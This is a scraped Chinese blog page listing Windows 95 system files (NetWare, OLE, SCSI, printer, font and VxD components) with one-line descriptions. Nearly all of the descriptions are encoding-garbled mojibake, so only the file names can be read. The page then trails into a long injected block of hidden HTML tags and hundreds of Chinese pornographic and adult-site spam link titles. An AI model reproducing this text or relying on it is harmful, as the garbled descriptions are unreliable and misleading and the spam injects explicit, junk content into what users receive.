NW16.DLL - NetWare瀹㈡埛
NWAB32.DLL - 鍦板潃綈挎敮鎸佸姩鎬侀摼鎺ュ簱
NWLSCON.EXE - 鐧誨綍鏂囩ǹ鎺у埗鍙扮▼搴?
NWLSPROC.EXE - NetWare鐧誨綍澶勭悊鍣?
NWNET32.DLL - NetWare瀹㈡埛
NWNP32.DLL - NetWare緇勪歡
NWREDIR.VXD - NetWare閲嶅畾鍚?
NWSERVER.VXD - NCP鏈嶅姟
NWSP.VXD - NCP鏈嶅姟瀹夊叏鎻愪緵

O銆鈫?
OEMREVA.INF - 瀹夎淇℃伅鏂囦歡
OLE2.DLL - OLE2.0鍔ㄦ侀摼鎺ュ簱
OLE2.INF - OLE璁劇疆淇℃伅
OLE32.DLL - 32浣峅LE2.0緇勪歡
OLEAUT32.DLL - OLE2-32鑷姩鍖?
OLECL1.DLL - 瀵硅薄閾炬帴涓庡祵鍏ュ鎴峰簱
OLEDLG.DLL - Windows OLE2.0鐢ㄦ埛鎺ュ彛鏀寔
OLESVR.DLL - 瀵硅薄閾炬帴涓庡祵鍏ユ湇鍔$搴?
OLETHK32.DLL - OLE褰㈠疄鏇挎崲紼嬪簭搴?

P銆鈫?
PACKAGER.EXE - 瀵硅薄鍖呰紼嬪簭
PARALINK.VXD - 榪滅▼緗戠粶瀛樺彇騫惰鍙i┍鍔ㄧ▼搴?
PBRVSH.EXE - "鐢誨浘"搴旂敤紼嬪簭
PDOS95.BAT - 榪涘叆涓枃DOS鐘舵?
PERF.VXD - 緋葷粺鎬ц兘鐩戣鍣?
PIFMGR.DLL - 紼嬪簭淇℃伅鏂囦歡綆$悊鏈嶅姟紼嬪簭
PING.EXE - TCPPing宸ュ叿
PMSPL.DLL - LAN綆$悊搴旂敤紼嬪簭鎺ュ彛
POWER.DRV - 楂樼駭鐢墊簮綆$悊椹卞姩紼嬪簭
PPPMAC.VXD - Windows铏氭嫙PPP椹卞姩紼嬪簭
PRINT.EXE - DOS鎵撳嵃鏂囦歡
PRINTERS.TXT - 鎵撳嵃淇℃伅鑷堪鏂囦歡
PROGMAN.EXE - 紼嬪簭綆$悊鍣?
PRTVPD.INF - 鎵撳嵃鏈哄崌綰ц緗俊鎭?

Q銆鈫?
QUIKVIEW.EXE - 蹇熸煡鐪?
QUIT.EXE - 閫鍑轟腑鏂嘍OS鐘舵?
R銆鈫?
README.TXT - Windows95鑷堪鏂囦歡
REGEDIT.EXE - 娉ㄥ唽緙栬緫鍣?
REGSERV.EXE - 榪滅▼娉ㄥ唽
REGWIE.EXE - 娉ㄥ唽宸ュ叿
REGSERV.INF - 榪滅▼娉ㄥ唽
RESTORE.EXE - DOS鍛戒護(hù)
RNAAPP.EXE - 鎷ㄥ彿緗戠粶搴旂敤紼嬪簭
RNASERV.DLL - 榪滅▼緗戠粶瀛樺彇鏈嶅姟
RNASETUP.DLL - 榪滅▼緗戠粶瀛樺彇璁劇疆鍔ㄦ侀摼鎺ュ簱
RNATHUNK.DLL - 榪滅▼緗戠粶瀛樺彇杞崲鏀寔鍔ㄦ侀摼鎺ュ簱
RNAUI.DLL - 榪滅▼緗戠粶瀛樺彇鐢ㄦ埛鎺ュ彛DLLRNDSRV32.DLL澶嶅埗鏈嶅姟紼嬪簭
ROBOTZCL.WAV - 澹伴煶鏂囦歡
ROBOTZWI.WAV - 澹伴煶鏂囦歡
ROMAN.FON - 瀛楀瀷鏂囦歡
ROUTE.EXE - TCP/IP ROUTE鍛戒護(hù)
RPCLTC1.DLL - 榪滅▼璋冪敤搴?
RPCNS4.DLL - 榪滅▼璋冪敤搴?
RPCPP.DLL - 榪滅▼璋冪敤鎵撳嵃椹卞姩
RPCRT4.DLL - 榪滅▼璋冪敤搴?
RPCSS.EXE - 榪滅▼璋冪敤緇撶偣鏄犺薄
RPLBOOT.SYS - 榪滅▼紼嬪簭瑁呭叆
RPLIMAGE.DLL - 榪滅▼紼嬪簭瑁呭叆紓佺洏鏄犺薄鍣?
RSRC16.DLL - 璧勬簮璁¢噺鍣?
RSRCMTR.EXE - 璧勬簮璁¢噺鍣?
RSRCMTR.INF - 璧勬簮璁¢噺鍣?
RUMOR.EXE - DDE嫻嬭瘯/娓告垙
RUNDLL.EXE - 鎶奃LL浣滀負(fù)搴旂敤紼嬪簭榪愯
RUNDLL32.EXE - 32浣嶅3緇勪歡
S銆鈫?
S3.DRV - S3鏄劇ず椹卞姩
S3.VXD - S3铏氭嫙璁懼
SACLIEN.DLL - Microsoft緗戠粶緇勪歡
SAMPLEVIDEOS - 鍥捐薄鏂囦歡
SAPNSP.DLL - Winsock鏁版嵁榪炴帴搴?
SAVE32.COM - 瀹夎鏃舵墍闇鐨凾SR鏂囦歡
SB16.VXD - 16浣嶅0鍗¤櫄鎷熻澶?
SB16SND.DRV - 16浣嶅0鍗¢┍鍔?
SBAWE.VXD - AWE澹板崱铏氭嫙璁懼
SBAWE32.DRV - AWE澹板崱椹卞姩
SBFM.DRV - 16浣嶅0鍗¢┍鍔?
SCANDISK.BAT - MSDOS6.x Scandisk鐨勬浛浠e瓨鏍規(guī)ā鍧桽CANDISK.BAT紓佺洏璇婃柇宸ュ叿
SCANDISK.INI - 紓佺洏璇婃柇宸ュ叿
SCANDISK.PIF - 瀹夎紓佺洏璇婃柇宸ュ叿鏃剁殑PIF鏂囦歡
SCANDSKW.EXE - 紓佺洏鎵弿宸ュ叿
SCANPROG.EXE - 紓佺洏鎵弿宸ュ叿
SCRNSAVE.SCR - 灞忓箷淇濇姢
SCSI.INF - SCSI瀹夎鏂囦歡鏂囦歡鍚嶆弿榪?
SCSIIHLP.VXD - SCSI鏀寔鏂囦歡
SCSIPORT.PDR - SCSI铏氭嫙璁懼鍙?
SECUR32.DLL - Microsoft Win32瀹夊叏鏈嶅姟
SECURCL.DLL - Microsoft緗戠粶緇勪歡
SEIKO24E.DRV - 鎵撳嵃鏈洪┍鍔?
SEIKOSH9.DRV - 鎵撳嵃鏈洪┍鍔?
SERIAL.VXD - 涓插彛VCOMM椹卞姩鍣?
SERIFE.FON - 瀛楀瀷鏂囦歡
SERVER.HLP - 鏈嶅姟鍣ㄥ府鍔╂枃浠?
SETMDIR.EXE - SBS鏂囦歡
SETUP.BIN - 瀹夎鏀寔鏂囦歡
SETUP.BMP - 瀹夎Wash浣嶅浘鏂囦歡
SETUP.EXE - Windows95瀹夎紼嬪簭
SETUP.INF - 瀹夎淇℃伅鏂囦歡
SETUP.TXT - 瀹夎鏃剁殑README鏂囦歡
SETUP4.DLL - 瀹夎鏀寔鏂囦歡
SETUPPP.INF - 瀹夎淇℃伅
SETUPX.DLL - 瀹夎鏀寔
SETVER.EXE - MSDOS鐗堟湰鏄劇ず,璇ョ▼搴忓彲鍦ㄧ綉緇滀笂鎵ц
SF4029.EXE - 鎵撳嵃鏈洪┍鍔?
SHARE.EXE - MSDOS鍏變韓瀹炵敤紼嬪簭
SHELL.INF - 瀹夎澹充俊鎭?
SHELL.VXD - 铏氭嫙澹寵澶?
SHELL2.INF - 棰滆壊緇勫悎
SHELL3.INF - 棰滆壊緇勫悎
SIZE1-1.CUR - 鍏夋爣
SIZE1-M.CUR - 鍏夋爣
SIZE4-M.CUR - 鍏夋爣
SIZENESW.ANI - 媧誨姩鍏夋爣
SIZEWE.ANI- 媧誨姩鍏夋爣
SKPSFA-1.SPD - 鎵撳嵃鏈洪┍鍔?
SLAN.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔?
SLCD32.MPD - SCSI椹卞姩鍣?
SLENH.DLL - 楂樼駭鑺傝兘閫夐」
SMALLE.FON - 瀛楀瀷鏂囦歡
SMALLF.FON - 瀛楀瀷鏂囦歡
SMARTDRV.EXE - 瓚呴珮閫熺紦瀛樼▼搴?
SMARTND.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔ㄥ櫒
SMC3000.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔ㄥ櫒
SMC9000.VXD - 緗戠粶閫傞厤鍣ㄩ┍鍔ㄥ櫒
SNAPSHOT.EXE - 鎶界偣
SNAPSHOT.VXD - 鎶界偣铏氭嫙璁懼
SNDREC32.EXE - 褰曢煶鏈?
SNIP.VXD - 緗戠粶閫傞厤椹卞姩鍣?
SOCKET.VXD - Windows铏氭嫙Socket緗戝崱椹卞姩鍣⊿OCKET.VXD PCMCIA鏀寔
SOL.CNT - 綰哥墝娓告垙
SOL.HLP - 綰哥墝娓告垙甯姪鏂囦歡
SORT.EXE - MSDOS鍒嗙被瀹炵敤紼嬪簭
SOUNDREC.CNT - 褰曢煶鏈哄府鍔╂枃浠跺唴瀹?
SOUNDREC.HLP - 褰曢煶鏈哄府鍔╂枃浠?
SPARROW.WPD - SCSI椹卞姩鍣?
SPARROWX.MPD - SCSI椹卞姩鍣?
SPOOL32.EXE - 鎵撳嵃鏈烘敮鎸?
SPOOLER.VXD - 鎵撳嵃鏈哄叡浜櫄鎷熻澶?
SRAMMTD.VXD - PCMCIA鏀寔
SSERIFE.FON - 瀛楀瀷鏂囦歡
SSERIFF.FON - 瀛楀瀷鏂囦歡
SSFLYWIN.SCR - 灞忓箷淇濇姢
SSSTARS.SCR - 灞忓箷淇濇姢
STAR24E.DRV - 鎵撳嵃鏈洪┍鍔?
STAR9E.DRV - 鎵撳嵃鏈洪┍鍔?
START.EXE - 鍚姩紼嬪簭
STATE.PBK - Microsoft緗戠粶緇勪歡
STDOLE.TLB - OLE2.0鏂囦歡
STDOLE32.TLB - OLE2-32鏂囦歡
STEMO409.DLL - Windows95甯姪鏂囦歡鐨凞LL
STLSO4SS.SPD - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
STLS577U.SPD - 鎵撳嵃鏈洪┍鍔ㄧ▼搴?
STORAGE.DLL - OLE瀛樺偍鍣ㄧ鐞嗗簱
STRN.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔?
SUBST.EXE - MSDOS Subst瀹炵敤紼嬪簭
SUEXPAND.DLL - LZ DLL瀹夎
SUHELPER.BIN - 瀹夎鏀寔
SUPERVGA.DRV - 楂樼駭VGA鏄劇ず椹卞姩
SURPORT.TXT - PSS鏀寔淇℃伅
SVCPROP.DLL - Microsoft緗戠粶緇勪歡
SVRAPI.DLL - 32浣嶅叕鐢ㄦ湇鍔″櫒API瀹炵敤紼嬪簭
SXCIEXT.DLL - Matrox鏄劇ず椹卞姩鏀寔鏂囦歡
SYMBOLE.FON - 瀛楀瀷鏂囦歡
SYS.COM - MSDOS緋葷粺瀹炵敤紼嬪簭
SYSCLASS.DLL - 緋葷粺綾誨簱瀹夎
SYSDETMG.DLL - 緋葷粺媯(gè)嫻嬪簱
SYSEDIT.EXE - 緋葷粺緙栬緫鍣?
SYSLOGO.RLE - 緋葷粺鏍囪瘑
SYSMON.EXE - 緋葷粺鐩戞帶紼嬪簭
SYSMON.HLP - 緋葷粺鐩戞帶甯姪
SYSTEM.DRV - 鏈灝廤in3.1鏍囧噯妯″紡
SYSTHUNK.DLL - Windows緋葷粺褰㈠疄鏇挎崲紼嬪簭搴?
SYSTRAY.EXE - 楂樼駭鑺傝兘綆$悊

T銆鈫?
T128.MPD - SCSI椹卞姩鍣?
T160.MPD - SCSI椹卞姩鍣?
T20N3.VXD - 緗戠粶閫傞厤椹卞姩鍣?
T30ND.DOS - 緗戠粶閫傞厤椹卞姩鍣?
T338.MPD - SCSI椹卞姩鍣?
TADA.WAV - 澹伴煶鏂囦歡
TAPI.DLL - API閫氳瘽紼嬪簭
TAPI.INF - API閫氳瘽瀹夎淇℃伅鏂囦歡
TAPI32.DLL - 32浣嶅艦瀹炴浛鎹?
TAPIADDR.DLL - API閫氳瘽紼嬪簭
TAPIEXE.EXE - API閫氳瘽緇勪歡
TAPIINI.EXE - API閫氳瘽緇勪歡
TASKMAM.EXE - 浠誨姟綆$悊鍣?
TCCARC.DOS - 緗戠粶閫傞厤椹卞姩鍣?
TCTOKCH.VXD - 緗戠粶閫傞厤椹卞姩鍣?
TELEPHON.CPL - 閫氳瘽甯姪
TESTPS.TXT - PostScript嫻嬭瘯
TEXTCHAT.EXE - Microsoft緗戠粶緇勪歡
THEMIC-1.WAV - 澹伴煶鏂囦歡
THINKJET.DRV - 鎵撳嵃鏈洪┍鍔?
THREED.VBX - Windows95嫻忚
T1850.DRV - 鎵撳嵃鏈洪┍鍔?
TIMEDATE.CPL - 鏃墮棿/鏃ユ湡鎺у埗闈㈡澘
TIMES.TTF - 鏃墮棿瀛楀瀷
TIMESBD.TTF - 鏃墮棿綺椾綋瀛楀瀷
TIMESBI.TTF - 鏃墮棿綺楁枩浣撳瓧鍨?
TIMESI.TTF - 鏃墮棿鏂滀綋瀛楀瀷
TIMEZONE.INF - 瀹夎淇℃伅
TIMLP232.SPD - 鎵撳嵃鏈洪┍鍔?
TIPS.txt - 鎻愮ず鍜屾妧宸ц嚜榪版枃浠?
TKPHZR32.SPD - 鎵撳嵃鏈洪┍鍔?
TLNK.DOS - 緗戠粶閫傞厤椹卞姩鍣?
TLNK3.VXD - 緗戠粶閫傞厤椹卞姩鍣?
TMV1.MPD - SCSI椹卞姩鍣?
TOOLHELP.DLL - 16浣嶅紑鍙戝伐鍏峰府鍔╁櫒
TOSHIBA.DRV - 鎵撳嵃鏈洪┍鍔?
TOUR.EXE - 嫻忚鏂囦歡
TPHAIII.ICM - 鎵撳嵃鏈虹畝浠?
TRACERT.EXE - TCP/IP IRACEROUTE鍛戒護(hù)
TREE.COM - MS DOS鏍?wèi)瀹炵敤绋嬪?
TREEEDCL.DLL - Microsoft緗戠粶緇勪歡
TREENVCL.DLL - Microsoft緗戠粶緇勪歡
TRIUMPHI.SPD - 鎵撳嵃鏈洪┍鍔?
TSD32.DLL - 澹伴煶鍘嬬緝綆$悊鍣?
TSENG.DRV - ET4000W32鏄劇ず椹卞姩
TTY.DRV - 鎵撳嵃鏈洪┍鍔?
TTY.HLP - TTY鎵撳嵃鏈洪┍鍔ㄥ府鍔?
TYPELIB.DLL - OLE2.0

U銆鈫?
U9415470.SPD - 鎵撳嵃鏈洪┍鍔?
UBNEI.DOS - 緗戠粶閫傞厤鍣ㄩ┍鍔?
ULTRA124.MPD - SCSI椹卞姩鍣?
ULTRA24F.MPD - SCSI椹卞姩鍣?
UMDM16.DLL - 閫氱敤璋冨埗瑙h皟鍣ㄩ┍鍔ㄧ粍浠?
UMDM32.DLL - 閫氱敤璋冨埗瑙h皟鍣ㄩ┍鍔ㄧ粍浠?
UNIDRV.DLL - Microsoft閫氱敤鎵撳嵃鏈洪┍鍔ㄥ簱
UNIDRV.HLP - 閫氱敤鎵撳嵃鏈洪┍鍔ㄥ府鍔?
UNIMODEM.VXD - 閫氱敤璋冨埗瑙h皟鍣ㄩ┍鍔?
USER32.DLL - 32浣嶇敤鎴?

V銆鈫?
V86MMGR.VXD - V86MMGR铏氭嫙璁懼
VCACHE.VXD - VCache铏氭嫙璁懼
VCD.VXD - 铏氭嫙COM椹卞姩紼嬪簭
VCOMM.VXD - VCOMM椹卞姩紼嬪簭
VCOND.VXD - Win32鎺у埗鍙?
VDMAD.VXD - VDMAD铏氭嫙璁懼
VER.DLL - 灝忓瀷Win3.1瀹夎紼嬪簭16浣嶇増鍔ㄦ侀摼鎺ュ簱
VER.NEW - 鐗堟湰媯(gè)嫻嬩笌鏂囦歡瀹夎搴?
VERSION.DLL - 32浣嶇増鏈姩鎬侀摼鎺ュ簱
VERX.DLL - 瀹夎紼嬪簭浣跨敤鐨勭増鏈姩鎬佸簱
VFAT.VXD - VFAT鏂囦歡緋葷粺
VFD.VXD - 杞洏铏氭嫙璁懼
VFLATD.VXD - 铏氭嫙騫蟲(chóng)澘甯х紦瀛樿櫄鎷熻澶?
VGA.DRV - VGA鏄劇ず椹卞姩紼嬪簭
VIDCAP.INF - 鍗蟲(chóng)彃鍗崇敤VCD淇℃伅
VIDEOT.VXD - 瑙嗛铏氭嫙璁懼
VIP.386 - TCP/IP铏氭嫙IP璁懼
VJOYD.VXD - 娓告垙媯掕櫄鎷熻澶?
VKD.VXD - 铏氭嫙閿洏璁懼
VLB32.DLL - Mail/Exchange緇勪歡
VMD.VXD - Win3.1铏氭嫙榧犳爣椹卞姩紼嬪簭
VMM.VXD - 铏氭嫙瀛樺偍綆$悊璁懼
VMM32.VXD - 铏氭嫙瀛樺偍綆$悊璁懼
VMOUSE.VXD - 铏氭嫙榧犳爣椹卞姩紼嬪簭
VNBT.386 - NetBIOS浼犺緭椹卞姩紼嬪簭
VNETBIOS.VXD - VNETBIOS铏氭嫙璁懼
VNETSUP.VXD - 緗戠粶鏀寔铏氭嫙璁懼
VPD.VXD - 铏氭嫙LPT椹卞姩紼嬪簭
VPICD.VXD - 铏氭嫙鍙紪紼嬪共鎵版帶鍒跺櫒璁懼
VPOWERD.VXD - 楂樼駭鐢墊簮綆$悊铏氭嫙璁懼
VREDIR.VXD - Microsoft緗戠粶32浣嶅鎴風(fēng)紼嬪簭
VSAMI.DLL - AMI鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSASC8.DLL - ASCII鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSBMP.DLL - BMP鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSERVER.VXD - Microsoft緗戠粶32浣嶆湇鍔″櫒绔▼搴?
VSGIF.DLL - GIF鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSHARE.VXD - 32浣嶅叡浜櫄鎷熻澶囬┍鍔ㄧ▼搴?
VSMSW.DLL - Win鍐欐枃浠惰娉曞垎鏋?
VSPP.DLL - PowerPoint璇硶鍒嗘瀽紼嬪簭
VSRTF.DLL - RTF鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSTIFF.DLL - TIFF鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSW6.DLL - Word6鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSWORD.DLL - Word鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSWP5.DLL - WordPerfect5鏂囦歡璇硶鍒嗘瀽紼嬪簭
VSXL5.DLL - Excel鏂囦歡/鍥捐〃璇硶鍒嗘瀽紼嬪簭
VTCP.386 - TCP/IP铏氭嫙TCP椹卞姩紼嬪簭
VTDAPI.VXD - VTDAPI铏氭嫙璁懼
VTDI.386 - 浼犺緭椹卞姩鎺ュ彛鏀寔紼嬪簭
VXDLDR.VXD - 铏氭嫙璁懼椹卞姩紼嬪簭瑁呰澆鍣?

W銆鈫?
WAVE.INF - 鍗蟲(chóng)彃鍗崇敤闊蟲(chóng)嘗璁懼淇℃伅
WDTOOOEX.MPD - SCSI椹卞姩
WGPOADMN.DLL - Mail/Exchange緇勪歡
WHLP16T.DLL - 甯姪鍔ㄦ侀摼鎺ュ簱
WIN87EM.DLL - 80387鏁板浠跨湡搴?
WINABC.HLP - 鏅鴻兘ABC甯姪鏂囦歡
WINBX.HLP - 琛ㄥ艦鐮佽緭鍏ユ硶甯姪鏂囦歡
WINCHA.HLP - 綣佷綋浠撻杈撳叆娉曞府鍔╂枃浠?
WINDOWS.CNT - Windows95甯姪鏂囦歡鍐呭
WINDOWS.HLP - Windows95甯姪鏂囦歡
WINFILE.CNT - 鏂囦歡綆$悊鍣ㄥ府鍔╂枃浠跺唴瀹?
WINFILE.EXE - Windows宸ヤ綔緇勬枃浠剁鐞嗗櫒
WINFILE.HLP - 鏂囦歡綆$悊鍣ㄥ府鍔╂枃浠?
WINGB.HLP - 鍖轟綅鐮佽緭鍏ユ硶甯姪鏂囦歡
WINHLP23.HLP - Windows甯姪鏂囦歡
WINIME.HLP - *浣滄寚鍗楀府鍔╂枃浠?
WINNM.HLP - GBK鍐呯爜杈撳叆娉曞府鍔╂枃浠?
WININIT.EXE - Windows鍒濆鍖栨枃浠?
WINIPCFG.EXE - TCP/IP閰嶇疆宸ュ叿
WINNEWS.TXT - Winnews淇℃伅
WINPHO.HLP - 綣佷綋娉ㄩ煶杈撳叆娉曞府鍔╂枃浠?
WINPOPUP.EXE - POPUP宸ュ叿
WINREG.DLL - 榪滅▼娉ㄥ唽鏀寔
WINPY.HLP - 鍏ㄦ嫾杈撳叆娉曞府鍔╂枃浠?
WINSOCK.DLL - Windows鐨勫鎺PI
WINSY.HLP - 鍙屾嫾杈撳叆娉曞府鍔╂枃浠?
WINXSP.HLP - GBK鍙屾嫾杈撳叆娉曞府鍔╂枃浠?
WINXZM.HLP - GBK閮戠爜杈撳叆娉曞府鍔?
WINZM.HLP - 閮戠爜杈撳叆娉曞府鍔╂枃浠?
WNASPI32.DLL - Windows DLL32浣岮SPI
WPSUNI.DRV - 浼犵湡椹卞姩紼嬪簭
WPSUNIRE.DLL - WPS涓繪満璧勬簮鎵ц紼嬪簭

X銆鈫?
XCOPY.EXE - DOS XCOPY宸ュ叿
XCOPY32.EXE - 鏂囦歡鎷瘋礉紼嬪簭
XGA.DRV - XGA鏄劇ず椹卞姩紼嬪簭

Asp 2006-10-01 18:25 鍙戣〃璇勮
]]> 青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

    • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>

      <noscript id="pjuwb"></noscript>
            <sup id="pjuwb"><pre id="pjuwb"></pre></sup>

              <dd id="pjuwb"></dd>
              <abbr id="pjuwb"></abbr>
              
麻豆成人小视频|
欧美亚洲一区在线|
国产精品美女久久久久av超清|
久久一区中文字幕|
久久综合伊人77777尤物|
久久综合久久88|
欧美国产在线观看|
欧美日韩欧美一区二区|
欧美午夜激情视频|
国产有码在线一区二区视频|
国产字幕视频一区二区|
1000部精品久久久久久久久|
亚洲激情中文1区|
亚洲图片欧美一区|
久久精品99无色码中文字幕
|
久久国产加勒比精品无码|
久久精品国产久精国产思思|
亚洲国产成人av|
亚洲毛片av在线|
午夜精品久久久久99热蜜桃导演|
久久久www免费人成黑人精品|
欧美国产一区二区|
国产精品夜色7777狼人|
1024亚洲|
午夜久久久久久|
欧美激情国产精品|
亚洲一区二区伦理|
免费观看一区|
亚洲天堂免费在线观看视频|
久久中文字幕一区|
国产欧美va欧美不卡在线|
亚洲精品美女在线|
久久蜜臀精品av|
一区二区激情小说|
男女激情久久|
国产亚洲人成网站在线观看|
一本一道久久综合狠狠老精东影业|
欧美在线1区|
日韩视频精品在线|
美女亚洲精品|
国产在线乱码一区二区三区|
午夜精品一区二区三区在线播放|
亚洲国产高清一区|
久久久久久久波多野高潮日日|
国产精品久久久久久亚洲调教|
亚洲日本中文字幕区|
久久久久一本一区二区青青蜜月|
99re66热这里只有精品4|
美腿丝袜亚洲色图|
欲色影视综合吧|
久久久久久久久久久久久9999|
一区二区三区四区五区在线|
欧美精品97|
亚洲人成网站在线播|
免费久久99精品国产自|
久久精品官网|
黄色国产精品一区二区三区|
欧美中文字幕不卡|
亚洲欧美久久久|
国产欧美日韩精品丝袜高跟鞋
|
亚洲免费观看在线视频|
麻豆精品91|
久久精品国产免费|
黄色成人在线免费|
免费日韩精品中文字幕视频在线|
久久久久久久综合色一本|
黄色成人在线免费|
欧美成人日本|
欧美伦理影院|
亚洲一区在线播放|
亚洲欧美在线高清|
在线观看的日韩av|
亚洲电影网站|
欧美日韩免费在线观看|
午夜视频在线观看一区二区三区|
亚洲欧美日韩区|
国内精品伊人久久久久av一坑|
久久综合给合|
欧美福利视频在线观看|
亚洲小说欧美另类社区|
亚洲欧美一区二区三区在线
|
羞羞视频在线观看欧美|
亚洲字幕在线观看|
韩国av一区二区三区四区|
欧美成人在线免费观看|
99国产一区|
欧美性猛交xxxx免费看久久久
|
午夜精品久久久久久99热|
亚洲男人的天堂在线aⅴ视频|
国产亚洲一区在线播放|
欧美成人一区在线|
国产精品v亚洲精品v日韩精品|
欧美一区二区三区四区在线观看|
久久精品综合|
中日韩在线视频|
久久精品视频va|
中文欧美字幕免费|
久久av在线|
一本高清dvd不卡在线观看|
亚洲免费视频成人|
亚洲国产天堂久久国产91|
亚洲色图自拍|
亚洲欧洲日韩综合二区|
欧美一区三区三区高中清蜜桃|
最新日韩av|
亚洲欧美日韩网|
亚洲黄色免费|
欧美在线视频全部完|
99成人在线|
久久久久网址|
久久国产欧美日韩精品|
欧美高清在线观看|
久久久精品国产免费观看同学|
欧美国产一区二区在线观看|
久久精品视频网|
国产精品免费aⅴ片在线观看|
欧美风情在线观看|
国产日产精品一区二区三区四区的观看方式
|
久久久免费精品|
亚洲免费在线|
欧美极品欧美精品欧美视频|
久久久亚洲影院你懂的|
欧美午夜电影在线观看|
91久久精品国产91久久|
国产永久精品大片wwwapp|
一区二区三区免费看|
亚洲精品自在在线观看|
久久综合色一综合色88|
久久亚洲视频|
国产一区美女|
欧美专区一区二区三区|
久久国产精品毛片|
国产日韩欧美在线视频观看|
亚洲一区二区三区欧美|
亚洲一级黄色|
欧美日韩国产小视频|
亚洲国产色一区|
亚洲免费观看高清在线观看|
亚洲国产天堂网精品网站|
在线精品视频一区二区|
久久免费高清|
男男成人高潮片免费网站|
在线国产日韩|
欧美国产1区2区|
日韩视频一区二区|
亚洲性图久久|
国产亚洲精品久久飘花|
欧美在线观看视频一区二区|
久久精品视频在线免费观看|
国产精品婷婷午夜在线观看|
亚洲免费人成在线视频观看|
久久国产日本精品|
精品动漫一区二区|
久久夜色精品国产欧美乱|
欧美电影美腿模特1979在线看|
一区二区三区在线视频播放|
久久综合九色综合久99|
亚洲福利专区|
亚洲私拍自拍|
国产日韩欧美一区在线|
久久久爽爽爽美女图片|
欧美激情一区在线|
亚洲无线一线二线三线区别av|
国产精品免费久久久久久|
亚洲影院免费|
免费看的黄色欧美网站|
99国产精品自拍|
国产精品性做久久久久久|
久久久久9999亚洲精品|
亚洲激情图片小说视频|
午夜久久黄色|
亚洲欧洲日本国产|
国产精品女人久久久久久|
久久精品一区|
99ri日韩精品视频|
久久综合福利|
亚洲在线播放电影|
亚洲国产高清自拍|
国产精品一区二区女厕厕|
蜜臀99久久精品久久久久久软件|
亚洲美女黄色片|
久热精品视频在线观看|
在线亚洲欧美|
亚洲国产精品国自产拍av秋霞|
欧美午夜欧美|
美女脱光内衣内裤视频久久影院
|
校园春色国产精品|
亚洲国产一二三|
国产日韩精品一区二区三区|
欧美电影资源|
久久精品72免费观看|
亚洲免费视频观看|
日韩亚洲欧美成人一区|
欧美成人免费在线观看|
久久精品国产亚洲高清剧情介绍|
一本色道久久综合亚洲精品婷婷
|
国产欧美日韩精品在线|
欧美乱妇高清无乱码|
六月婷婷一区|
久久久www成人免费无遮挡大片
|